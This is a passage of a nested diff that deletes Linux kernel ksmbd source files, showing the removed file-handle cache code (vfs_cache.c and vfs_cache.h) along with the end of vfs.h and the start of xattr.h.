+-struct file_allocated_range_buffer;
+-int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
+-			 struct file_allocated_range_buffer *ranges,
+-			 unsigned int in_count, unsigned int *out_count);
+-int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+-		     struct dentry *dir, struct dentry *dentry);
+-void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat);
+-int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
+-				struct user_namespace *user_ns,
+-				struct dentry *dentry,
+-				struct ksmbd_kstat *ksmbd_kstat);
+-void ksmbd_vfs_posix_lock_wait(struct file_lock *flock);
+-int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout);
+-void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock);
+-int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+-				struct dentry *dentry);
+-int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+-			       struct dentry *dentry);
+-int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+-			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd *pntsd, int len);
+-int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
+-			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd **pntsd);
+-int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da);
+-int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da);
+-int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+-				 struct inode *inode);
+-int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+-				struct inode *inode,
+-				struct inode *parent_inode);
+-#endif /* __KSMBD_VFS_H__ */
+diff --git a/fs/ksmbd/vfs_cache.c b/fs/ksmbd/vfs_cache.c
+deleted file mode 100644
+index 0ae5dd0829e92..0000000000000
+--- a/fs/ksmbd/vfs_cache.c
++++ /dev/null
+@@ -1,708 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- * Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <linux/vmalloc.h>
+-
+-#include "glob.h"
+-#include "vfs_cache.h"
+-#include "oplock.h"
+-#include "vfs.h"
+-#include "connection.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/user_session.h"
+-#include "smb_common.h"
+-
+-#define S_DEL_PENDING			1
+-#define S_DEL_ON_CLS			2
+-#define S_DEL_ON_CLS_STREAM		8
+-
+-static unsigned int inode_hash_mask __read_mostly;
+-static unsigned int inode_hash_shift __read_mostly;
+-static struct hlist_head *inode_hashtable __read_mostly;
+-static DEFINE_RWLOCK(inode_hash_lock);
+-
+-static struct ksmbd_file_table global_ft;
+-static atomic_long_t fd_limit;
+-static struct kmem_cache *filp_cache;
+-
+-void ksmbd_set_fd_limit(unsigned long limit)
+-{
+-	limit = min(limit, get_max_files());
+-	atomic_long_set(&fd_limit, limit);
+-}
+-
+-static bool fd_limit_depleted(void)
+-{
+-	long v = atomic_long_dec_return(&fd_limit);
+-
+-	if (v >= 0)
+-		return false;
+-	atomic_long_inc(&fd_limit);
+-	return true;
+-}
+-
+-static void fd_limit_close(void)
+-{
+-	atomic_long_inc(&fd_limit);
+-}
+-
+-/*
+- * INODE hash
+- */
+-
+-static unsigned long inode_hash(struct super_block *sb, unsigned long hashval)
+-{
+-	unsigned long tmp;
+-
+-	tmp = (hashval * (unsigned long)sb) ^ (GOLDEN_RATIO_PRIME + hashval) /
+-		L1_CACHE_BYTES;
+-	tmp = tmp ^ ((tmp ^ GOLDEN_RATIO_PRIME) >> inode_hash_shift);
+-	return tmp & inode_hash_mask;
+-}
+-
+-static struct ksmbd_inode *__ksmbd_inode_lookup(struct inode *inode)
+-{
+-	struct hlist_head *head = inode_hashtable +
+-		inode_hash(inode->i_sb, inode->i_ino);
+-	struct ksmbd_inode *ci = NULL, *ret_ci = NULL;
+-
+-	hlist_for_each_entry(ci, head, m_hash) {
+-		if (ci->m_inode == inode) {
+-			if (atomic_inc_not_zero(&ci->m_count))
+-				ret_ci = ci;
+-			break;
+-		}
+-	}
+-	return ret_ci;
+-}
+-
+-static struct ksmbd_inode *ksmbd_inode_lookup(struct ksmbd_file *fp)
+-{
+-	return __ksmbd_inode_lookup(file_inode(fp->filp));
+-}
+-
+-static struct ksmbd_inode *ksmbd_inode_lookup_by_vfsinode(struct inode *inode)
+-{
+-	struct ksmbd_inode *ci;
+-
+-	read_lock(&inode_hash_lock);
+-	ci = __ksmbd_inode_lookup(inode);
+-	read_unlock(&inode_hash_lock);
+-	return ci;
+-}
+-
+-int ksmbd_query_inode_status(struct inode *inode)
+-{
+-	struct ksmbd_inode *ci;
+-	int ret = KSMBD_INODE_STATUS_UNKNOWN;
+-
+-	read_lock(&inode_hash_lock);
+-	ci = __ksmbd_inode_lookup(inode);
+-	if (ci) {
+-		ret = KSMBD_INODE_STATUS_OK;
+-		if (ci->m_flags & S_DEL_PENDING)
+-			ret = KSMBD_INODE_STATUS_PENDING_DELETE;
+-		atomic_dec(&ci->m_count);
+-	}
+-	read_unlock(&inode_hash_lock);
+-	return ret;
+-}
+-
+-bool ksmbd_inode_pending_delete(struct ksmbd_file *fp)
+-{
+-	return (fp->f_ci->m_flags & S_DEL_PENDING);
+-}
+-
+-void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp)
+-{
+-	fp->f_ci->m_flags |= S_DEL_PENDING;
+-}
+-
+-void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp)
+-{
+-	fp->f_ci->m_flags &= ~S_DEL_PENDING;
+-}
+-
+-void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
+-				  int file_info)
+-{
+-	if (ksmbd_stream_fd(fp)) {
+-		fp->f_ci->m_flags |= S_DEL_ON_CLS_STREAM;
+-		return;
+-	}
+-
+-	fp->f_ci->m_flags |= S_DEL_ON_CLS;
+-}
+-
+-static void ksmbd_inode_hash(struct ksmbd_inode *ci)
+-{
+-	struct hlist_head *b = inode_hashtable +
+-		inode_hash(ci->m_inode->i_sb, ci->m_inode->i_ino);
+-
+-	hlist_add_head(&ci->m_hash, b);
+-}
+-
+-static void ksmbd_inode_unhash(struct ksmbd_inode *ci)
+-{
+-	write_lock(&inode_hash_lock);
+-	hlist_del_init(&ci->m_hash);
+-	write_unlock(&inode_hash_lock);
+-}
+-
+-static int ksmbd_inode_init(struct ksmbd_inode *ci, struct ksmbd_file *fp)
+-{
+-	ci->m_inode = file_inode(fp->filp);
+-	atomic_set(&ci->m_count, 1);
+-	atomic_set(&ci->op_count, 0);
+-	atomic_set(&ci->sop_count, 0);
+-	ci->m_flags = 0;
+-	ci->m_fattr = 0;
+-	INIT_LIST_HEAD(&ci->m_fp_list);
+-	INIT_LIST_HEAD(&ci->m_op_list);
+-	rwlock_init(&ci->m_lock);
+-	return 0;
+-}
+-
+-static struct ksmbd_inode *ksmbd_inode_get(struct ksmbd_file *fp)
+-{
+-	struct ksmbd_inode *ci, *tmpci;
+-	int rc;
+-
+-	read_lock(&inode_hash_lock);
+-	ci = ksmbd_inode_lookup(fp);
+-	read_unlock(&inode_hash_lock);
+-	if (ci)
+-		return ci;
+-
+-	ci = kmalloc(sizeof(struct ksmbd_inode), GFP_KERNEL);
+-	if (!ci)
+-		return NULL;
+-
+-	rc = ksmbd_inode_init(ci, fp);
+-	if (rc) {
+-		pr_err("inode initialized failed\n");
+-		kfree(ci);
+-		return NULL;
+-	}
+-
+-	write_lock(&inode_hash_lock);
+-	tmpci = ksmbd_inode_lookup(fp);
+-	if (!tmpci) {
+-		ksmbd_inode_hash(ci);
+-	} else {
+-		kfree(ci);
+-		ci = tmpci;
+-	}
+-	write_unlock(&inode_hash_lock);
+-	return ci;
+-}
+-
+-static void ksmbd_inode_free(struct ksmbd_inode *ci)
+-{
+-	ksmbd_inode_unhash(ci);
+-	kfree(ci);
+-}
+-
+-static void ksmbd_inode_put(struct ksmbd_inode *ci)
+-{
+-	if (atomic_dec_and_test(&ci->m_count))
+-		ksmbd_inode_free(ci);
+-}
+-
+-int __init ksmbd_inode_hash_init(void)
+-{
+-	unsigned int loop;
+-	unsigned long numentries = 16384;
+-	unsigned long bucketsize = sizeof(struct hlist_head);
+-	unsigned long size;
+-
+-	inode_hash_shift = ilog2(numentries);
+-	inode_hash_mask = (1 << inode_hash_shift) - 1;
+-
+-	size = bucketsize << inode_hash_shift;
+-
+-	/* init master fp hash table */
+-	inode_hashtable = vmalloc(size);
+-	if (!inode_hashtable)
+-		return -ENOMEM;
+-
+-	for (loop = 0; loop < (1U << inode_hash_shift); loop++)
+-		INIT_HLIST_HEAD(&inode_hashtable[loop]);
+-	return 0;
+-}
+-
+-void ksmbd_release_inode_hash(void)
+-{
+-	vfree(inode_hashtable);
+-}
+-
+-static void __ksmbd_inode_close(struct ksmbd_file *fp)
+-{
+-	struct dentry *dir, *dentry;
+-	struct ksmbd_inode *ci = fp->f_ci;
+-	int err;
+-	struct file *filp;
+-
+-	filp = fp->filp;
+-	if (ksmbd_stream_fd(fp) && (ci->m_flags & S_DEL_ON_CLS_STREAM)) {
+-		ci->m_flags &= ~S_DEL_ON_CLS_STREAM;
+-		err = ksmbd_vfs_remove_xattr(file_mnt_user_ns(filp),
+-					     filp->f_path.dentry,
+-					     fp->stream.name);
+-		if (err)
+-			pr_err("remove xattr failed : %s\n",
+-			       fp->stream.name);
+-	}
+-
+-	if (atomic_dec_and_test(&ci->m_count)) {
+-		write_lock(&ci->m_lock);
+-		if (ci->m_flags & (S_DEL_ON_CLS | S_DEL_PENDING)) {
+-			dentry = filp->f_path.dentry;
+-			dir = dentry->d_parent;
+-			ci->m_flags &= ~(S_DEL_ON_CLS | S_DEL_PENDING);
+-			write_unlock(&ci->m_lock);
+-			ksmbd_vfs_unlink(file_mnt_user_ns(filp), dir, dentry);
+-			write_lock(&ci->m_lock);
+-		}
+-		write_unlock(&ci->m_lock);
+-
+-		ksmbd_inode_free(ci);
+-	}
+-}
+-
+-static void __ksmbd_remove_durable_fd(struct ksmbd_file *fp)
+-{
+-	if (!has_file_id(fp->persistent_id))
+-		return;
+-
+-	write_lock(&global_ft.lock);
+-	idr_remove(global_ft.idr, fp->persistent_id);
+-	write_unlock(&global_ft.lock);
+-}
+-
+-static void __ksmbd_remove_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
+-{
+-	if (!has_file_id(fp->volatile_id))
+-		return;
+-
+-	write_lock(&fp->f_ci->m_lock);
+-	list_del_init(&fp->node);
+-	write_unlock(&fp->f_ci->m_lock);
+-
+-	write_lock(&ft->lock);
+-	idr_remove(ft->idr, fp->volatile_id);
+-	write_unlock(&ft->lock);
+-}
+-
+-static void __ksmbd_close_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
+-{
+-	struct file *filp;
+-	struct ksmbd_lock *smb_lock, *tmp_lock;
+-
+-	fd_limit_close();
+-	__ksmbd_remove_durable_fd(fp);
+-	__ksmbd_remove_fd(ft, fp);
+-
+-	close_id_del_oplock(fp);
+-	filp = fp->filp;
+-
+-	__ksmbd_inode_close(fp);
+-	if (!IS_ERR_OR_NULL(filp))
+-		fput(filp);
+-
+-	/* because the reference count of fp is 0, it is guaranteed that
+-	 * there are not accesses to fp->lock_list.
+-	 */
+-	list_for_each_entry_safe(smb_lock, tmp_lock, &fp->lock_list, flist) {
+-		spin_lock(&fp->conn->llist_lock);
+-		list_del(&smb_lock->clist);
+-		spin_unlock(&fp->conn->llist_lock);
+-
+-		list_del(&smb_lock->flist);
+-		locks_free_lock(smb_lock->fl);
+-		kfree(smb_lock);
+-	}
+-
+-	if (ksmbd_stream_fd(fp))
+-		kfree(fp->stream.name);
+-	kmem_cache_free(filp_cache, fp);
+-}
+-
+-static struct ksmbd_file *ksmbd_fp_get(struct ksmbd_file *fp)
+-{
+-	if (!atomic_inc_not_zero(&fp->refcount))
+-		return NULL;
+-	return fp;
+-}
+-
+-static struct ksmbd_file *__ksmbd_lookup_fd(struct ksmbd_file_table *ft,
+-					    u64 id)
+-{
+-	struct ksmbd_file *fp;
+-
+-	if (!has_file_id(id))
+-		return NULL;
+-
+-	read_lock(&ft->lock);
+-	fp = idr_find(ft->idr, id);
+-	if (fp)
+-		fp = ksmbd_fp_get(fp);
+-	read_unlock(&ft->lock);
+-	return fp;
+-}
+-
+-static void __put_fd_final(struct ksmbd_work *work, struct ksmbd_file *fp)
+-{
+-	__ksmbd_close_fd(&work->sess->file_table, fp);
+-	atomic_dec(&work->conn->stats.open_files_count);
+-}
+-
+-static void set_close_state_blocked_works(struct ksmbd_file *fp)
+-{
+-	struct ksmbd_work *cancel_work;
+-
+-	spin_lock(&fp->f_lock);
+-	list_for_each_entry(cancel_work, &fp->blocked_works,
+-				 fp_entry) {
+-		cancel_work->state = KSMBD_WORK_CLOSED;
+-		cancel_work->cancel_fn(cancel_work->cancel_argv);
+-	}
+-	spin_unlock(&fp->f_lock);
+-}
+-
+-int ksmbd_close_fd(struct ksmbd_work *work, u64 id)
+-{
+-	struct ksmbd_file	*fp;
+-	struct ksmbd_file_table	*ft;
+-
+-	if (!has_file_id(id))
+-		return 0;
+-
+-	ft = &work->sess->file_table;
+-	read_lock(&ft->lock);
+-	fp = idr_find(ft->idr, id);
+-	if (fp) {
+-		set_close_state_blocked_works(fp);
+-
+-		if (!atomic_dec_and_test(&fp->refcount))
+-			fp = NULL;
+-	}
+-	read_unlock(&ft->lock);
+-
+-	if (!fp)
+-		return -EINVAL;
+-
+-	__put_fd_final(work, fp);
+-	return 0;
+-}
+-
+-void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp)
+-{
+-	if (!fp)
+-		return;
+-
+-	if (!atomic_dec_and_test(&fp->refcount))
+-		return;
+-	__put_fd_final(work, fp);
+-}
+-
+-static bool __sanity_check(struct ksmbd_tree_connect *tcon, struct ksmbd_file *fp)
+-{
+-	if (!fp)
+-		return false;
+-	if (fp->tcon != tcon)
+-		return false;
+-	return true;
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id)
+-{
+-	return __ksmbd_lookup_fd(&work->sess->file_table, id);
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_fd_fast(struct ksmbd_work *work, u64 id)
+-{
+-	struct ksmbd_file *fp = __ksmbd_lookup_fd(&work->sess->file_table, id);
+-
+-	if (__sanity_check(work->tcon, fp))
+-		return fp;
+-
+-	ksmbd_fd_put(work, fp);
+-	return NULL;
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
+-					u64 pid)
+-{
+-	struct ksmbd_file *fp;
+-
+-	if (!has_file_id(id)) {
+-		id = work->compound_fid;
+-		pid = work->compound_pfid;
+-	}
+-
+-	fp = __ksmbd_lookup_fd(&work->sess->file_table, id);
+-	if (!__sanity_check(work->tcon, fp)) {
+-		ksmbd_fd_put(work, fp);
+-		return NULL;
+-	}
+-	if (fp->persistent_id != pid) {
+-		ksmbd_fd_put(work, fp);
+-		return NULL;
+-	}
+-	return fp;
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id)
+-{
+-	return __ksmbd_lookup_fd(&global_ft, id);
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid)
+-{
+-	struct ksmbd_file	*fp = NULL;
+-	unsigned int		id;
+-
+-	read_lock(&global_ft.lock);
+-	idr_for_each_entry(global_ft.idr, fp, id) {
+-		if (!memcmp(fp->create_guid,
+-			    cguid,
+-			    SMB2_CREATE_GUID_SIZE)) {
+-			fp = ksmbd_fp_get(fp);
+-			break;
+-		}
+-	}
+-	read_unlock(&global_ft.lock);
+-
+-	return fp;
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode)
+-{
+-	struct ksmbd_file	*lfp;
+-	struct ksmbd_inode	*ci;
+-
+-	ci = ksmbd_inode_lookup_by_vfsinode(inode);
+-	if (!ci)
+-		return NULL;
+-
+-	read_lock(&ci->m_lock);
+-	list_for_each_entry(lfp, &ci->m_fp_list, node) {
+-		if (inode == file_inode(lfp->filp)) {
+-			atomic_dec(&ci->m_count);
+-			lfp = ksmbd_fp_get(lfp);
+-			read_unlock(&ci->m_lock);
+-			return lfp;
+-		}
+-	}
+-	atomic_dec(&ci->m_count);
+-	read_unlock(&ci->m_lock);
+-	return NULL;
+-}
+-
+-#define OPEN_ID_TYPE_VOLATILE_ID	(0)
+-#define OPEN_ID_TYPE_PERSISTENT_ID	(1)
+-
+-static void __open_id_set(struct ksmbd_file *fp, u64 id, int type)
+-{
+-	if (type == OPEN_ID_TYPE_VOLATILE_ID)
+-		fp->volatile_id = id;
+-	if (type == OPEN_ID_TYPE_PERSISTENT_ID)
+-		fp->persistent_id = id;
+-}
+-
+-static int __open_id(struct ksmbd_file_table *ft, struct ksmbd_file *fp,
+-		     int type)
+-{
+-	u64			id = 0;
+-	int			ret;
+-
+-	if (type == OPEN_ID_TYPE_VOLATILE_ID && fd_limit_depleted()) {
+-		__open_id_set(fp, KSMBD_NO_FID, type);
+-		return -EMFILE;
+-	}
+-
+-	idr_preload(GFP_KERNEL);
+-	write_lock(&ft->lock);
+-	ret = idr_alloc_cyclic(ft->idr, fp, 0, INT_MAX - 1, GFP_NOWAIT);
+-	if (ret >= 0) {
+-		id = ret;
+-		ret = 0;
+-	} else {
+-		id = KSMBD_NO_FID;
+-		fd_limit_close();
+-	}
+-
+-	__open_id_set(fp, id, type);
+-	write_unlock(&ft->lock);
+-	idr_preload_end();
+-	return ret;
+-}
+-
+-unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp)
+-{
+-	__open_id(&global_ft, fp, OPEN_ID_TYPE_PERSISTENT_ID);
+-	return fp->persistent_id;
+-}
+-
+-struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp)
+-{
+-	struct ksmbd_file *fp;
+-	int ret;
+-
+-	fp = kmem_cache_zalloc(filp_cache, GFP_KERNEL);
+-	if (!fp) {
+-		pr_err("Failed to allocate memory\n");
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	INIT_LIST_HEAD(&fp->blocked_works);
+-	INIT_LIST_HEAD(&fp->node);
+-	INIT_LIST_HEAD(&fp->lock_list);
+-	spin_lock_init(&fp->f_lock);
+-	atomic_set(&fp->refcount, 1);
+-
+-	fp->filp		= filp;
+-	fp->conn		= work->conn;
+-	fp->tcon		= work->tcon;
+-	fp->volatile_id		= KSMBD_NO_FID;
+-	fp->persistent_id	= KSMBD_NO_FID;
+-	fp->f_ci		= ksmbd_inode_get(fp);
+-
+-	if (!fp->f_ci) {
+-		ret = -ENOMEM;
+-		goto err_out;
+-	}
+-
+-	ret = __open_id(&work->sess->file_table, fp, OPEN_ID_TYPE_VOLATILE_ID);
+-	if (ret) {
+-		ksmbd_inode_put(fp->f_ci);
+-		goto err_out;
+-	}
+-
+-	atomic_inc(&work->conn->stats.open_files_count);
+-	return fp;
+-
+-err_out:
+-	kmem_cache_free(filp_cache, fp);
+-	return ERR_PTR(ret);
+-}
+-
+-static int
+-__close_file_table_ids(struct ksmbd_file_table *ft,
+-		       struct ksmbd_tree_connect *tcon,
+-		       bool (*skip)(struct ksmbd_tree_connect *tcon,
+-				    struct ksmbd_file *fp))
+-{
+-	unsigned int			id;
+-	struct ksmbd_file		*fp;
+-	int				num = 0;
+-
+-	idr_for_each_entry(ft->idr, fp, id) {
+-		if (skip(tcon, fp))
+-			continue;
+-
+-		set_close_state_blocked_works(fp);
+-
+-		if (!atomic_dec_and_test(&fp->refcount))
+-			continue;
+-		__ksmbd_close_fd(ft, fp);
+-		num++;
+-	}
+-	return num;
+-}
+-
+-static bool tree_conn_fd_check(struct ksmbd_tree_connect *tcon,
+-			       struct ksmbd_file *fp)
+-{
+-	return fp->tcon != tcon;
+-}
+-
+-static bool session_fd_check(struct ksmbd_tree_connect *tcon,
+-			     struct ksmbd_file *fp)
+-{
+-	return false;
+-}
+-
+-void ksmbd_close_tree_conn_fds(struct ksmbd_work *work)
+-{
+-	int num = __close_file_table_ids(&work->sess->file_table,
+-					 work->tcon,
+-					 tree_conn_fd_check);
+-
+-	atomic_sub(num, &work->conn->stats.open_files_count);
+-}
+-
+-void ksmbd_close_session_fds(struct ksmbd_work *work)
+-{
+-	int num = __close_file_table_ids(&work->sess->file_table,
+-					 work->tcon,
+-					 session_fd_check);
+-
+-	atomic_sub(num, &work->conn->stats.open_files_count);
+-}
+-
+-int ksmbd_init_global_file_table(void)
+-{
+-	return ksmbd_init_file_table(&global_ft);
+-}
+-
+-void ksmbd_free_global_file_table(void)
+-{
+-	struct ksmbd_file	*fp = NULL;
+-	unsigned int		id;
+-
+-	idr_for_each_entry(global_ft.idr, fp, id) {
+-		__ksmbd_remove_durable_fd(fp);
+-		kmem_cache_free(filp_cache, fp);
+-	}
+-
+-	ksmbd_destroy_file_table(&global_ft);
+-}
+-
+-int ksmbd_init_file_table(struct ksmbd_file_table *ft)
+-{
+-	ft->idr = kzalloc(sizeof(struct idr), GFP_KERNEL);
+-	if (!ft->idr)
+-		return -ENOMEM;
+-
+-	idr_init(ft->idr);
+-	rwlock_init(&ft->lock);
+-	return 0;
+-}
+-
+-void ksmbd_destroy_file_table(struct ksmbd_file_table *ft)
+-{
+-	if (!ft->idr)
+-		return;
+-
+-	__close_file_table_ids(ft, NULL, session_fd_check);
+-	idr_destroy(ft->idr);
+-	kfree(ft->idr);
+-	ft->idr = NULL;
+-}
+-
+-int ksmbd_init_file_cache(void)
+-{
+-	filp_cache = kmem_cache_create("ksmbd_file_cache",
+-				       sizeof(struct ksmbd_file), 0,
+-				       SLAB_HWCACHE_ALIGN, NULL);
+-	if (!filp_cache)
+-		goto out;
+-
+-	return 0;
+-
+-out:
+-	pr_err("failed to allocate file cache\n");
+-	return -ENOMEM;
+-}
+-
+-void ksmbd_exit_file_cache(void)
+-{
+-	kmem_cache_destroy(filp_cache);
+-}
+diff --git a/fs/ksmbd/vfs_cache.h b/fs/ksmbd/vfs_cache.h
+deleted file mode 100644
+index fcb13413fa8d9..0000000000000
+--- a/fs/ksmbd/vfs_cache.h
++++ /dev/null
+@@ -1,166 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __VFS_CACHE_H__
+-#define __VFS_CACHE_H__
+-
+-#include <linux/file.h>
+-#include <linux/fs.h>
+-#include <linux/rwsem.h>
+-#include <linux/spinlock.h>
+-#include <linux/idr.h>
+-#include <linux/workqueue.h>
+-
+-#include "vfs.h"
+-
+-/* Windows style file permissions for extended response */
+-#define	FILE_GENERIC_ALL	0x1F01FF
+-#define	FILE_GENERIC_READ	0x120089
+-#define	FILE_GENERIC_WRITE	0x120116
+-#define	FILE_GENERIC_EXECUTE	0X1200a0
+-
+-#define KSMBD_START_FID		0
+-#define KSMBD_NO_FID		(INT_MAX)
+-#define SMB2_NO_FID		(0xFFFFFFFFFFFFFFFFULL)
+-
+-struct ksmbd_conn;
+-struct ksmbd_session;
+-
+-struct ksmbd_lock {
+-	struct file_lock *fl;
+-	struct list_head clist;
+-	struct list_head flist;
+-	struct list_head llist;
+-	unsigned int flags;
+-	int cmd;
+-	int zero_len;
+-	unsigned long long start;
+-	unsigned long long end;
+-};
+-
+-struct stream {
+-	char *name;
+-	ssize_t size;
+-};
+-
+-struct ksmbd_inode {
+-	rwlock_t			m_lock;
+-	atomic_t			m_count;
+-	atomic_t			op_count;
+-	/* opinfo count for streams */
+-	atomic_t			sop_count;
+-	struct inode			*m_inode;
+-	unsigned int			m_flags;
+-	struct hlist_node		m_hash;
+-	struct list_head		m_fp_list;
+-	struct list_head		m_op_list;
+-	struct oplock_info		*m_opinfo;
+-	__le32				m_fattr;
+-};
+-
+-struct ksmbd_file {
+-	struct file			*filp;
+-	u64				persistent_id;
+-	u64				volatile_id;
+-
+-	spinlock_t			f_lock;
+-
+-	struct ksmbd_inode		*f_ci;
+-	struct ksmbd_inode		*f_parent_ci;
+-	struct oplock_info __rcu	*f_opinfo;
+-	struct ksmbd_conn		*conn;
+-	struct ksmbd_tree_connect	*tcon;
+-
+-	atomic_t			refcount;
+-	__le32				daccess;
+-	__le32				saccess;
+-	__le32				coption;
+-	__le32				cdoption;
+-	__u64				create_time;
+-	__u64				itime;
+-
+-	bool				is_nt_open;
+-	bool				attrib_only;
+-
+-	char				client_guid[16];
+-	char				create_guid[16];
+-	char				app_instance_id[16];
+-
+-	struct stream			stream;
+-	struct list_head		node;
+-	struct list_head		blocked_works;
+-	struct list_head		lock_list;
+-
+-	int				durable_timeout;
+-
+-	/* if ls is happening on directory, below is valid*/
+-	struct ksmbd_readdir_data	readdir_data;
+-	int				dot_dotdot[2];
+-};
+-
+-static inline void set_ctx_actor(struct dir_context *ctx,
+-				 filldir_t actor)
+-{
+-	ctx->actor = actor;
+-}
+-
+-#define KSMBD_NR_OPEN_DEFAULT BITS_PER_LONG
+-
+-struct ksmbd_file_table {
+-	rwlock_t		lock;
+-	struct idr		*idr;
+-};
+-
+-static inline bool has_file_id(u64 id)
+-{
+-	return id < KSMBD_NO_FID;
+-}
+-
+-static inline bool ksmbd_stream_fd(struct ksmbd_file *fp)
+-{
+-	return fp->stream.name != NULL;
+-}
+-
+-int ksmbd_init_file_table(struct ksmbd_file_table *ft);
+-void ksmbd_destroy_file_table(struct ksmbd_file_table *ft);
+-int ksmbd_close_fd(struct ksmbd_work *work, u64 id);
+-struct ksmbd_file *ksmbd_lookup_fd_fast(struct ksmbd_work *work, u64 id);
+-struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id);
+-struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
+-					u64 pid);
+-void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp);
+-struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id);
+-struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid);
+-struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode);
+-unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp);
+-struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp);
+-void ksmbd_close_tree_conn_fds(struct ksmbd_work *work);
+-void ksmbd_close_session_fds(struct ksmbd_work *work);
+-int ksmbd_close_inode_fds(struct ksmbd_work *work, struct inode *inode);
+-int ksmbd_init_global_file_table(void);
+-void ksmbd_free_global_file_table(void);
+-void ksmbd_set_fd_limit(unsigned long limit);
+-
+-/*
+- * INODE hash
+- */
+-int __init ksmbd_inode_hash_init(void);
+-void ksmbd_release_inode_hash(void);
+-
+-enum KSMBD_INODE_STATUS {
+-	KSMBD_INODE_STATUS_OK,
+-	KSMBD_INODE_STATUS_UNKNOWN,
+-	KSMBD_INODE_STATUS_PENDING_DELETE,
+-};
+-
+-int ksmbd_query_inode_status(struct inode *inode);
+-bool ksmbd_inode_pending_delete(struct ksmbd_file *fp);
+-void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp);
+-void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp);
+-void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
+-				  int file_info);
+-int ksmbd_init_file_cache(void);
+-void ksmbd_exit_file_cache(void);
+-#endif /* __VFS_CACHE_H__ */
+diff --git a/fs/ksmbd/xattr.h b/fs/ksmbd/xattr.h
+deleted file mode 100644
+index 16499ca5c82d3..0000000000000
+--- a/fs/ksmbd/xattr.h
++++ /dev/null
+@@ -1,122 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2021 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __XATTR_H__
+-#define __XATTR_H__
+-
+-/*
+- * These are on-disk structures to store additional metadata into xattr to
+- * reproduce windows filesystem semantics. And they are encoded with NDR to
+- * compatible with samba's xattr meta format. The compatibility with samba
+- * is important because it can lose the information(file attribute,
+- * creation time, acls) about the existing files when switching between
+- * ksmbd and samba.
+- */
+-
+-/*
+- * Dos attribute flags used for what variable is valid.
+- */
+-enum {
+-	XATTR_DOSINFO_ATTRIB		= 0x00000001,
+-	XATTR_DOSINFO_EA_SIZE		= 0x00000002,
+-	XATTR_DOSINFO_SIZE		= 0x00000004,
+-	XATTR_DOSINFO_ALLOC_SIZE	= 0x00000008,
+-	XATTR_DOSINFO_CREATE_TIME	= 0x00000010,
+-	XATTR_DOSINFO_CHANGE_TIME	= 0x00000020,
+-	XATTR_DOSINFO_ITIME		= 0x00000040
+-};
+-
+-/*
+- * Dos attribute structure which is compatible with samba's one.
+- * Storing it into the xattr named "DOSATTRIB" separately from inode
+- * allows ksmbd to faithfully reproduce windows filesystem semantics
+- * on top of a POSIX filesystem.
+- */
+-struct xattr_dos_attrib {
+-	__u16	version;	/* version 3 or version 4 */
+-	__u32	flags;		/* valid flags */
+-	__u32	attr;		/* Dos attribute */
+-	__u32	ea_size;	/* EA size */
+-	__u64	size;
+-	__u64	alloc_size;
+-	__u64	create_time;	/* File creation time */
+-	__u64	change_time;	/* File change time */
+-	__u64	itime;		/* Invented/Initial time */
+-};
+-
+-/*
+- * Enumeration is used for computing posix acl hash.
+- */
+-enum {
